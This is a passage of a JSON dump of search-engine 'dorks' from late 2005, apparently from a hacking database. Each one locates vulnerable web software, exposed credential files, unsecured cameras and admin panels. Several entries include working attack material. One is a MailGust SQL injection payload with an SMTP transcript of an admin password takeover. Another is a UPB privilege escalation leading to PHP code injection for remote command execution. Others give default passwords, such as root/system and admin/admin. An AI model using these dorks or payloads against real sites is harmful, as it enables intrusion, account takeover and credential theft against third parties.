whereuser_name='[username]' /*", "submited": "2005-09-26", "request": "\"powered by my little forum\"", "id": 1146}, {"short description": "\"powered by mailgust\"", "long description": "MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevorsoftware:site: http://www.mailgust.org/description:Mailgust is three softwares in one: * Mailing list manager * Newsletter distribution tool * Message Board Mailgust is written in php and uses a mysql database. 
vulnerability:if magic quotes off -> SQL Injectionwithout to have an account, a user can send himself a new admin password usingpassword reminder, in email field type:[yuor_email],'or'a'='a'/*@hotmail.comgive a look to what happen:220 [MAILSERVER] SMTP Service readyHELO [MAILGUST]250 [MAILSERVER].MAIL FROM:250 MAIL FROM: OKRCPT TO:250 RCPT TO:>[your_email] OKRCPT TO: OKDATA354 Start mail input; end with .Date: Sat, 24 Sep 2005 16:11:38 +0100Subject: New passwordTo: [your_email],'or'a'='a'/*@hotmail.comFrom: systemxxx@localhost.comYour login name is: [admin_email]Your new password is: 4993587Click here:http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114to activate the password, than try to log in!It is recommended that you change your password afterwards..250 Mail acceptedQUIT221 [MAILSERVER] QUITvulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:...$query = \"SELECT * FROM $applName\".\"_$userClassName \". \"WHERE email='$this->email'\";...it becomes:SELECT * FROM maillist_maillistuser WHERE email='[yuor_email],'or'a'='a'/*@hotmail.com'\"or'a'='a'\" is always true, so the query is always true, script doesn't fail, for mail function, theese are two valid email address,it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;)activate the password, now you can login with [admin_email] as user and new passwordu can find my poc exploit here:http://rgod.altervista.org/maildisgust.html", "submited": "2005-09-26", "request": "\"powered by mailgust\"", "id": 1147}, {"short description": "intitle:\"Folder Listing\" \"Folder Listing\" Name Size Date/Time File Folder", "long description": "directory listing for Fastream NETFile Web Server", "submited": "2005-09-26", "request": "intitle:\"Folder Listing\" \"Folder Listing\" Name Size Date/Time File Folder", "id": 1148}, {"short description": "\"Directory Listing for\" \"Hosted by Xerver\"", "long description": "directory listing for 
Xerver web server", "submited": "2005-09-26", "request": "\"Directory Listing for\" \"Hosted by Xerver\"", "id": 1149}, {"short description": "intitle:\"Supero Doctor III\" -inurl:supermicro", "long description": "\"Supero Doctor III Remote Management\" by Supermicro, Inc.info: http://www.supermicro.es/products/accessories/software/SuperODoctorIII.htmljust look for default password...", "submited": "2005-09-26", "request": "intitle:\"Supero Doctor III\" -inurl:supermicro", "id": 1150}, {"short description": "intitle:\"Netcam\" intitle:\"user login\"", "long description": "just yet other online cam.", "submited": "2005-09-26", "request": "intitle:\"Netcam\" intitle:\"user login\"", "id": 1151}, {"short description": "Powered by PHP-Fusion v6.00.109 2003-2005. -php-fusion.co.uk", "long description": "this is the dork: Powered by PHP-Fusion 2003-2005. -php-fusion.co.ukas it is, without quotes, for the version I tested, prone toSQL Injection / administrative credentials disclosurethis my advisory/poc exploit: http://rgod.altervista.org/phpfusion600109.html", "submited": "2005-09-28", "request": "Powered by PHP-Fusion v6.00.109 2003-2005. -php-fusion.co.uk", "id": 1152}, {"short description": "inurl:/yabb/Members/Admin.dat", "long description": "This search will show you the Administrator password (very first line) on YaBB forums whose owners didnt configure the permissions correctly. Go up a directory to get a full memberlist (the .dat files have the passwords).", "submited": "2005-09-28", "request": "inurl:/yabb/Members/Admin.dat", "id": 1153}, {"short description": "intitle:\"Biromsoft WebCam\" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000", "long description": "Brimsoft webcam software enables anyone with a webcam to easily create a webcam http server. 
This googledork looks for these webcam servers.", "submited": "2005-09-29", "request": "intitle:\"Biromsoft WebCam\" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000", "id": 1154}, {"short description": "(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:g", "long description": "I don't know if the google query got submitted right because it looks truncated. here it is again:(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:golb.org -site:chat.ru -site:findlastminute.de -site:tricus.de -site:urlaubus.de -johnny.ihackstuff VisionGS webcam software enables anyone with a webcam to easily host a webcam http server. This dork finds those servers.", "submited": "2005-09-29", "request": "(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:g", "id": 1155}, {"short description": "\"Powered By: lucidCMS 1.0.11\"", "long description": "Lucid CMS 1.0.11 SQL Injection /Login bypassthis is the dork for ther version I tested:\"Powered By: lucidCMS 1.0.11\"advisory/poc exploit:http://rgod.altervista.org/lucidcms1011.htmlwe have an XSS even:http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt", "submited": "2005-09-29", "request": "\"Powered By: lucidCMS 1.0.11\"", "id": 1156}, {"short description": "\"News generated by Utopia News Pro\" | \"Powered By: Utopia News Pro\"", "long description": "Utopia News Pro 1.1.3 (and prior versions) SQL Injection & XSSadvisory & poc exploit:http://rgod.altervista.org/utopia113.html", "submited": "2005-10-06", "request": "\"News generated by Utopia News Pro\" | \"Powered By: Utopia News Pro\"", "id": 1157}, {"short description": "inurl:login.jsp.bak", "long description": "JSP programmer 
anyone? You can read this!", "submited": "2005-09-30", "request": "inurl:login.jsp.bak", "id": 1158}, {"short description": "intitle:Mantis \"Welcome to the bugtracker\" \"0.15 | 0.16 | 0.17 | 0.18\"", "long description": "Cross site scripting and SQL injection vulnerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. Vulnerability report at http://search.securityfocus.com/archive/1/411591/30/0/threaded", "submited": "2005-10-03", "request": "intitle:Mantis \"Welcome to the bugtracker\" \"0.15 | 0.16 | 0.17 | 0.18\"", "id": 1159}, {"short description": "intitle:\"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603\" intitle:\"Live Images\"", "long description": "This is a googledork for IQeye netcams. Some of which you can control how they tilt/zoom. The default admin username/password are root/system.", "submited": "2005-10-03", "request": "intitle:\"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603\" intitle:\"Live Images\"", "id": 1160}, {"short description": "intitle:\"urchin (5|3|admin)\" ext:cgi", "long description": "Gain access to Urchin analysis reports.", "submited": "2005-10-04", "request": "intitle:\"urchin (5|3|admin)\" ext:cgi", "id": 1161}, {"short description": "inurl:status.cgi?host=all", "long description": "Nagios Status page. 
See what ports are being monitored as well as ip addresses.Be sure to check the google cached page first.", "submited": "2005-10-04", "request": "inurl:status.cgi?host=all", "id": 1162}, {"short description": "inurl:polly/CP", "long description": "You can get into admin panel without logging.", "submited": "2005-10-06", "request": "inurl:polly/CP", "id": 1163}, {"short description": "\"Cyphor (Release:\" -www.cynox.ch", "long description": "Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scriptingmy advisory & poc exploit:http://rgod.altervista.org/cyphor019.htmlrgodModerator PS: The software is longer maintained.", "submited": "2005-10-08", "request": "\"Cyphor (Release:\" -www.cynox.ch", "id": 1164}, {"short description": "\"Welcome to the versatileBulletinBoard\" | \"Powered by versatileBulletinBoard\"", "long description": "versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosureadvisory:http://rgod.altervista.org/versatile100RC2.html", "submited": "2005-10-10", "request": "\"Welcome to the versatileBulletinBoard\" | \"Powered by versatileBulletinBoard\"", "id": 1165}, {"short description": "inurl:ocw_login_username", "long description": "WEBppliance is a software application designed to automate the deployment and management of Web-hosting services. There is a bug in how this product does the Logon validation. This Search will take you directly into the Admin pages....U can delete an User....(Plz dont do that..)Enjoy,Night Hacker", "submited": "2005-10-13", "request": "inurl:ocw_login_username", "id": 1166}, {"short description": "intitle:Bookmarks inurl:bookmarks.html \"Bookmarks", "long description": "AFAIK are the bookmarks of Firefox, Netscape and Mozilla stored in bookmarks.html. 
It is often uploaded to serve as a backup, so it could reveal some juicy information.", "submited": "2005-10-22", "request": "intitle:Bookmarks inurl:bookmarks.html \"Bookmarks", "id": 1167}, {"short description": "\"The following report contains confidential information\" vulnerability -search", "long description": "This googledork reveals vunerability reports from many different vendors. These reports can contain information which can help an attacker break into a system/network.", "submited": "2005-10-26", "request": "\"The following report contains confidential information\" vulnerability -search", "id": 1168}, {"short description": "\"Shadow Security Scanner performed a vulnerability assessment\"", "long description": "This is a googledork to find vulnerability reports produced by Shadow Security Scanner. They contain valuable information which can be used to break into a system.", "submited": "2005-10-26", "request": "\"Shadow Security Scanner performed a vulnerability assessment\"", "id": 1169}, {"short description": "intitle:\"Docutek ERes - Admin Login\" -edu", "long description": "Docutek Eres is software that helps libaries get an internet end to them. This dork finds the admin login in page. Using Docutek Eres you can look through course material amoung other things.", "submited": "2005-10-26", "request": "intitle:\"Docutek ERes - Admin Login\" -edu", "id": 1170}, {"short description": "intitle:\"Retina Report\" \"CONFIDENTIAL INFORMATION\"", "long description": "This googledork finds vulnerability reports produced by eEye Retina Security Scanner. The information inside these reports can help an attacker break into a system/network.", "submited": "2005-10-26", "request": "intitle:\"Retina Report\" \"CONFIDENTIAL INFORMATION\"", "id": 1171}, {"short description": "intitle:\"CJ Link Out V1\"", "long description": "A cross site scripting vunerability has been discovered in CJ linkout version 1.x. 
CJ linkout is a free product which allows you to easily let users connect to a different site with a frame at the top which links back to your site. The vulnerability report can be found at http://secunia.com/advisories/16970/ .", "submited": "2005-10-26", "request": "intitle:\"CJ Link Out V1\"", "id": 1172}, {"short description": "server-dbs \"intitle:index of\"", "long description": "Yes, people actually post their teamspeak servers on websites. Just look for the words superadmin in the files and the password trails it in plain text.", "submited": "2005-10-30", "request": "server-dbs \"intitle:index of\"", "id": 1173}, {"short description": "inurl:\"Sites.dat\"+\"PASS=\"", "long description": "FlashFXP has the ability to import a Sites.dat file into its current Sites.dat file, using this search query you are able to find websites misconfigured to share the flashfxp folder and subsequently the Sites.dat file containing all custom sites the victim has in their sitelist. the passwords are not clear text but if you import the sites.dat into flashfxp you can connect to the ftps and it automatically sends the password. you can also set flashfxp to not hide passwords and it will show you what the password is when it connects.", "submited": "2005-11-03", "request": "inurl:\"Sites.dat\"+\"PASS=\"", "id": 1174}, {"short description": "(\"port_255/home\")|(inurl:\"home?port=255\")", "long description": "standered printer search. 
Moderator note: see also dork id=1221", "submited": "2005-11-05", "request": "(\"port_255/home\")|(inurl:\"home?port=255\")", "id": 1175}, {"short description": "\"This page is for configuring Samsung Network Printer\" | printerDetails.htm", "long description": "several different samsung printers", "submited": "2005-11-11", "request": "\"This page is for configuring Samsung Network Printer\" | printerDetails.htm", "id": 1176}, {"short description": "log inurl:linklint filetype:txt -\"checking\"", "long description": "Linklint is an Open Source Perl program that checks links on web sites. This search finds the Linklint log directory. Complete site map able to be recreated, and if you go back one directory you can see all the other files generated by linklint. Thanks to CP for direction.", "submited": "2005-11-11", "request": "log inurl:linklint filetype:txt -\"checking\"", "id": 1177}, {"short description": "inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php", "long description": "Moodle", "submited": "2005-11-12", "request": "inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php", "id": 1178}, {"short description": "\"Powered by XOOPS 2.2.3 Final\"", "long description": "XOOPS 2.2.3 Arbitrary local file inclusionThis a generic dork for the version I tested, advisory & poc exploit:http://rgod.altervista.org/xoops_xpl.html", "submited": "2005-11-12", "request": "\"Powered by XOOPS 2.2.3 Final\"", "id": 1179}, {"short description": "inurl:\"wfdownloads/viewcat.php?list=\"", "long description": "XOOPS WF_Downloads (2.05) module SQL injectionThis a specific dork, that searches XOOPS sites with WF_Downloads module installed, advisory & poc exploit:http://rgod.altervista.org/xoops_xpl.html", "submited": "2005-11-12", "request": "inurl:\"wfdownloads/viewcat.php?list=\"", "id": 1180}, {"short description": "intitle:\"OnLine Recruitment Program - Login\" -johnny.ihackstuff", "long description": "This is the 
Employer's Interface of eRecruiter, a 100% Paper Less Recruitment Solution implemented by Universal Virtual Office. The only time you need to use paper is when you give out the appointment letter.The access to the Employer's Zone is restricted to authorized users only. Please authenticate your identity.", "submited": "2005-11-12", "request": "intitle:\"OnLine Recruitment Program - Login\" -johnny.ihackstuff", "id": 1181}, {"short description": "intitle:\"EXTRANET * - Identification\"", "long description": "WorkZone Extranet Solution login page. All portals are in french or spanish I belive.", "submited": "2005-11-12", "request": "intitle:\"EXTRANET * - Identification\"", "id": 1182}, {"short description": "intitle:\"EXTRANET login\" -.edu -.mil -.gov -johnny.ihackstuff", "long description": "This search finds many different Extranet login pages.", "submited": "2005-11-12", "request": "intitle:\"EXTRANET login\" -.edu -.mil -.gov -johnny.ihackstuff", "id": 1183}, {"short description": "intitle:\"*- HP WBEM Login\" | \"You are being prompted to provide login account information for *\" | \"Please provide the information requested and press", "long description": "HP WBEM Clients are WBEM enabled management applications that provide the user interface and functionality system administrators need to manage their environment.", "submited": "2005-11-12", "request": "intitle:\"*- HP WBEM Login\" | \"You are being prompted to provide login account information for *\" | \"Please provide the information requested and press", "id": 1184}, {"short description": "intitle:\"Novell Web Services\" \"GroupWise\" -inurl:\"doc/11924\" -.mil -.edu -.gov -filetype:pdf", "long description": "Novell GroupWise is a complete collaboration software solution that provides information workers with e-mail, calendaring, instant messaging, task management, and contact and document management functions. 
The leading alternative to Microsoft Exchange, GroupWise has long been praised by customers and industry watchers for its security and reliability.", "submited": "2005-11-12", "request": "intitle:\"Novell Web Services\" \"GroupWise\" -inurl:\"doc/11924\" -.mil -.edu -.gov -filetype:pdf", "id": 1185}, {"short description": "\"iCONECT 4.1 :: Login\"", "long description": "This search finds the login page for iCONECTnxt, it enables firms to search, organize, and review electronic and document discovery information including email, native files, and images from anywhere in the world for easy collaboration with outside counsel, branch offices, and consultants. LAN and Web solutions available.", "submited": "2005-11-12", "request": "\"iCONECT 4.1 :: Login\"", "id": 1186}, {"short description": "\"Powered by Merak Mail Server Software\" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff", "long description": "Webmail login portals for Merak Email ServerMerak Email Server Suite consists of multiple awards winner Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWare", "submited": "2005-11-13", "request": "\"Powered by Merak Mail Server Software\" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff", "id": 1187}, {"short description": "intitle:\"Merak Mail Server Web Administration\" -ihackstuff.com", "long description": "User login pages for Merak Email Server Suite which consists of Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWaremore info: h**p://www.icewarp.com", "submited": "2005-11-16", "request": "intitle:\"Merak Mail Server Web Administration\" -ihackstuff.com", "id": 1188}, {"short description": "ext:yml database inurl:config", "long description": "Ruby on Rails is a MVC 
full-stack framework for development of web applications. There's a configuration file in this framework called database.yml that links the Rails with the DB. It contains all the info needed to access de DB including username and password in clear text.", "submited": "2005-11-14", "request": "ext:yml database inurl:config", "id": 1189}, {"short description": "\"This is a restricted Access Server\" \"Javascript Not Enabled!\"|\"Messenger Express\" -edu -ac", "long description": "Mostly Login Pages for iPlanet Messenger Express, which is a web-based electronic mail program that enables end users to access their mailboxes using a browser. Messenger Express clients send mail to a specialized web server that is part of iPlanet Messaging Server. Thanks to the forum members for cleaning up the search.", "submited": "2005-11-16", "request": "\"This is a restricted Access Server\" \"Javascript Not Enabled!\"|\"Messenger Express\" -edu -ac", "id": 1190}, {"short description": "inurl:webvpn.html \"login\" \"Please enter your\"", "long description": "The Cisco WebVPN Services Module is a high-speed, integrated Secure Sockets Layer (SSL) VPN services module for Cisco products.", "submited": "2005-11-16", "request": "inurl:webvpn.html \"login\" \"Please enter your\"", "id": 1191}, {"short description": "intitle:\"SNOIE Intel Web Netport Manager\" OR intitle:\"Intel Web Netport Manager Setup/Status\"", "long description": "Intel Netport Express Print Server.", "submited": "2005-11-16", "request": "intitle:\"SNOIE Intel Web Netport Manager\" OR intitle:\"Intel Web Netport Manager Setup/Status\"", "id": 1192}, {"short description": "\"Establishing a secure Integrated Lights Out session with\" OR intitle:\"Data Frame - Browser not HTTP 1.1 compatible\" OR intitle:\"HP Integrated Lights-", "long description": "iLo and related login pages !? 
Whoops..", "submited": "2005-11-16", "request": "\"Establishing a secure Integrated Lights Out session with\" OR intitle:\"Data Frame - Browser not HTTP 1.1 compatible\" OR intitle:\"HP Integrated Lights-", "id": 1193}, {"short description": "inurl:nnls_brand.html OR inurl:nnls_nav.html", "long description": "Novell Nterprise Linux Services detection dork. Some of the features are:* iFolder* Samba* NetStorage* eDirectory Administration* Linux User Management* NMAS 2.3* NetMail 3.5* GroupWise 6.5* iPrint* Virtual Office", "submited": "2005-11-16", "request": "inurl:nnls_brand.html OR inurl:nnls_nav.html", "id": 1194}, {"short description": "intitle:\"Welcome to F-Secure Policy Manager Server Welcome Page\"", "long description": "An attacker may want to know about the antivirus software running. The description says he can check the status of the F-Secure Policy Manager Server's Host Module. He can also check the status of the Console Module, but only if he's reading the page from the local host.", "submited": "2005-11-16", "request": "intitle:\"Welcome to F-Secure Policy Manager Server Welcome Page\"", "id": 1195}, {"short description": "intitle:\"Summit Management Interface\" -georgewbush.org.uk", "long description": "Extreme Networks Summit Switches Web admin pages. Server: Allegro-Software-RomPager/2.10", "submited": "2005-11-16", "request": "intitle:\"Summit Management Interface\" -georgewbush.org.uk", "id": 1196}, {"short description": "intitle:Cisco \"You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator\"", "long description": "Login pages for Ciso VPN Concentrator stuff", "submited": "2005-11-16", "request": "intitle:Cisco \"You are using an old browser or have disabled javascript. 
You must use version 4 or higher of Netscape Navigator/Communicator\"", "id": 1197}, {"short description": "intitle:\"Iomega NAS Manager\" -ihackstuff.com", "long description": "Login page dork for Iomega NAS Manager.. There's only 1 result for it now, but this could change in the future.", "submited": "2005-11-16", "request": "intitle:\"Iomega NAS Manager\" -ihackstuff.com", "id": 1198}, {"short description": "\"This website was created with phpWebThings 1.4\"", "long description": "This is Secunia advisory:http://secunia.com/advisories/17410/and my exploit that show a new vulnerability in \"msg\" parameter:http://rgod.altervista.org/phpwebth14_xpl.html", "submited": "2005-11-17", "request": "\"This website was created with phpWebThings 1.4\"", "id": 1199}, {"short description": "\"site info for\" \"Enter Admin Password\"", "long description": "This will take you to the cash crusader admin login screen. It is my first google hack.. also try adding index.php at the end, have fun people :)", "submited": "2005-11-21", "request": "\"site info for\" \"Enter Admin Password\"", "id": 1200}, {"short description": "inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin", "long description": "***WARNING: This search uses google images, disable images unless you want your IP spewed across webpages!***Webalizer is a program that organizes who is going to a Webpage, what they are looking at, what user names are entered and endless other statistics.This is a great first step in getting too much information about a website. 
You see any links or files that are hidden, the search can be made more specific by using other google advanced searchs.Learn more about Webalizer(http://www.mrunix.net/webalizer/).", "submited": "2005-11-21", "request": "inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin", "id": 1201}, {"short description": "Display Cameras intitle:\"Express6 Live Image\"", "long description": "Express6 live video controller.Displays video from \"Netlive Cameras\" found in this search:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1416Several new cameras found in this search.", "submited": "2005-11-21", "request": "Display Cameras intitle:\"Express6 Live Image\"", "id": 1202}, {"short description": "intitle:\"Sony SNT-V304 Video Network Station\" inurl:hsrindex.shtml", "long description": "The SNT-V304 Video Network Station.Sony's network camera control station.", "submited": "2005-11-21", "request": "intitle:\"Sony SNT-V304 Video Network Station\" inurl:hsrindex.shtml", "id": 1203}, {"short description": "\"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved\" \"Mambo is Free Software released\"", "long description": "this dork is for Mambo 4.5.2x Globals overwrite / remote command execution exploit:http://rgod.altervista.org/mambo452_xpl.html", "submited": "2005-11-23", "request": "\"Copyright 2000 - 2005 Miro International Pty Ltd. 
All rights reserved\" \"Mambo is Free Software released\"", "id": 1204}, {"short description": "inurl:wp-mail.php + \"There doesn't seem to be any new mail.\"", "long description": "This is the WordPress script handling Post-By-Email functionality, the search is focussed on the message telling that there's nothing to process.If the script *does* have anything to progress, it will reveal the email-address of account that sent the message(s).", "submited": "2005-11-24", "request": "inurl:wp-mail.php + \"There doesn't seem to be any new mail.\"", "id": 1205}, {"short description": "(\"Skin Design by Amie of Intense\")|(\"Fanfiction Categories\" \"Featured Stories\")|(\"default2, 3column, Romance, eFiction\")", "long description": "eFiction", "submited": "2005-11-25", "request": "(\"Skin Design by Amie of Intense\")|(\"Fanfiction Categories\" \"Featured Stories\")|(\"default2, 3column, Romance, eFiction\")", "id": 1206}, {"short description": "\"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b)", "long description": "dork: \"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can't find it in GHDB and I am surprised of how it still works... register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and... boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board\"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" now in config.dat we have: ... $title=\"Ultimate PHP Board \"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" \"; ... in header.php we have: ... include \"./db/config.dat\"; ... 
so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd", "submited": "2005-11-25", "request": "\"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b)", "id": 1207}, {"short description": "\"powered by GuppY v4\"|\"Site cravec GuppY v4\"", "long description": "Guppy remote code execution / various arbitrary inclusion issuesadvisory & poc exploit:http://rgod.altervista.org/guppy459_xpl.html", "submited": "2005-11-28", "request": "\"powered by GuppY v4\"|\"Site cravec GuppY v4\"", "id": 1208}, {"short description": "\"Welcome to the directory listing of\" \"NetworkActiv-Web-Server\"", "long description": "this is for NetworkActiv-Web-Server directory listing", "submited": "2005-11-28", "request": "\"Welcome to the directory listing of\" \"NetworkActiv-Web-Server\"", "id": 1209}, {"short description": "intitle:\"Snap Server\" intitle:\"Home\" \"Active Users\"", "long description": "This an online device, you can search for unpassworded shares on Snap Appliance Server.Moderator notes:This was found by golfo on sep 8th, but he forgot to submit it (ouch).. Before that mlynch was the first to discover it. See:http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2784&highlight=snap+serverhttp://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=180", "submited": "2005-11-28", "request": "intitle:\"Snap Server\" intitle:\"Home\" \"Active Users\"", "id": 1210}, {"short description": "\"Powered by Xaraya\" \"Copyright 2005\"", "long description": "Xaraya", "submited": "2005-11-29", "request": "\"Powered by Xaraya\" \"Copyright 2005\"", "id": 1211}, {"short description": "\"parent directory\" +proftpdpasswd", "long description": "User names and password hashes from web server backups generated by cpanel for ProFTPd. Password hashes can be cracked, granting direct access to FTP accounts. 
Unix passwd and shadow files can sometimes be found with this query as well.", "submited": "2005-11-30", "request": "\"parent directory\" +proftpdpasswd", "id": 1212}, {"short description": "\"This website powered by PHPX\" -demo", "long description": "this is the dork for PhpX", "submited": "2005-11-30", "request": "\"This website powered by PHPX\" -demo", "id": 1213}, {"short description": "\"Warning: Installation directory exists at\" \"Powered by Zen Cart\" -demo", "long description": "by this dork you can find fresh installations of Zen-Cartsee Full Disclosure forums fore details... ;)", "submited": "2005-12-01", "request": "\"Warning: Installation directory exists at\" \"Powered by Zen Cart\" -demo", "id": 1214}, {"short description": "\"Based on DoceboLMS 2.0\"", "long description": "advisory & poc exploit:http://rgod.altervista.org/docebo204_xpl.html", "submited": "2005-12-04", "request": "\"Based on DoceboLMS 2.0\"", "id": 1215}, {"short description": "\"2005 SugarCRM Inc. All Rights Reserved\" \"Powered By SugarCRM\"", "long description": "this is the dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit:http://rgod.altervista.org/sugar_suite_40beta.html", "submited": "2005-12-07", "request": "\"2005 SugarCRM Inc. 
All Rights Reserved\" \"Powered By SugarCRM\"", "id": 1216}, {"short description": "inurl:Printers/ipp_0001.asp", "long description": "Thanks to Windows 2003 Remote Printing", "submited": "2005-12-08", "request": "inurl:Printers/ipp_0001.asp", "id": 1217}, {"short description": "\"Powered By phpCOIN 1.2.2\"", "long description": "PhpCOIN 1.2.2 arbitrary remote\\local inclusion / blind sql injection / path disclosureadvisory:http://rgod.altervista.org/phpcoin122.htmlmore generic:\"Powered By phpCOIN\"to see previous verions (not tested)", "submited": "2005-12-12", "request": "\"Powered By phpCOIN 1.2.2\"", "id": 1218}, {"short description": "intext:\"Powered by SimpleBBS v1.1\"*", "long description": "Vulnerability DescriptionSimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided.Solution DescriptionCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.Products:* SimpleMedia SimpleBBS 1.1 AffectedVulnerability classification:* Remote vulnerability* Input manipulation attack* Impact on integrity* Exploit unavailable* VerifiedMore info on Vuln: http://www.securityfocus.com/bid/15594", "submited": "2005-12-14", "request": "intext:\"Powered by SimpleBBS v1.1\"*", "id": 1219}, {"short description": "\"Site powered By Limbo CMS\"", "long description": "this is the dork for Limbo Cms", "submited": "2005-12-14", "request": "\"Site powered By Limbo CMS\"", "id": 1220}, {"short description": "inurl:ventrilo_srv.ini adminpassword", "long description": "This search reveals the ventrilo (voice communication program used by many online gamers) passwords for many servers. 
Possiblity of gaining control of the entire server.", "submited": "2005-12-19", "request": "inurl:ventrilo_srv.ini adminpassword", "id": 1221}, {"short description": "inurl:guestbook/guestbooklist.asp \"Post Date\" From Country", "long description": "A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.securityfocus.com/archive/1/414708/30/0/threadedSeveral ways of finding the vulnerable file:Guestbook (the above dork): inurl:guestbook/guestbooklist.asp \"Post Date\" From Country Results 1 - 21 of 123Announcement: inurl:MainAnnounce1.asp \"show all\" Results 1 -20 of 86WebDirectory: inurl:webdirectory \"Total Available Web Sites\" Search Results 1 - 4 of 5MailingList: inurl:maillinglist/emailsadd.asp Results 1 - 6 of 6note these dorks don't find the vulnerable script; to find it change the url to /admin/login.asp or /login.asp.The default admin user/pass is admin/admin. Some results leave this info on the page and others load the page with this info already filled out.", "submited": "2005-12-19", "request": "inurl:guestbook/guestbooklist.asp \"Post Date\" From", "id": 1222}, {"short description": "inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:\"Miva Merchant Administration Login\" -inurl:cheap-malboro.net", "long description": "Miva Merchant is a product that helps buisnesses get into e-commerce. This dork locates their admin login.", "submited": "2005-12-19", "request": "inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:\"Miva Merchant Administration Login\" -inurl:cheap-malboro.net", "id": 1223}, {"short description": "intitle:\"Admin login\" \"Web Site Administration\" \"Copyright\"", "long description": "sift Group makes a web site administration product which can be accessed via a web browser. 
This dork locates their admin login.", "submited": "2005-12-19", "request": "intitle:\"Admin login\" \"Web Site Administration\" \"Copyright\"", "id": 1224}, {"short description": "intitle:\"b2evo > Login form\" \"Login form. You must log in! You will have to accept cookies in order to log in\" -demo -site:b2evolution.net", "long description": "b2evolution is a free open-source blogging system from b2evolution.net. This dork finds the admin login.", "submited": "2005-12-19", "request": "intitle:\"b2evo > Login form\" \"Login form. You must log in! You will have to accept cookies in order to log in\" -demo -site:b2evolution.net", "id": 1225}, {"short description": "(intitle:WebStatistica inurl:main.php) | (intitle:\"WebSTATISTICA server\") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob", "long description": "WebStatistica provides detailed statistics about a web page. Normally you would have to login to view these statistics but the sites have put autologin on.", "submited": "2005-12-19", "request": "(intitle:WebStatistica inurl:main.php) | (intitle:\"WebSTATISTICA server\") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob", "id": 1226}, {"short description": "inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl", "long description": "Information about proxy servers, internal ip addresses and other network sensitive stuff.", "submited": "2005-12-21", "request": "inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl", "id": 1227}, {"short description": "inurl:/cgi-bin/pass.txt", "long description": "Passwords", "submited": "2005-12-22", "request": "inurl:/cgi-bin/pass.txt", "id": 1228}, {"short description": "\"Emergisoft web applications are a part of our\"", "long description": "Hospital patient management system, in theory it could be dangerous.", "submited": "2005-12-31", "request": "\"Emergisoft web applications are a part of our\"", "id": 1229}, {"short description": "inurl:/img/vr.htm", "long 
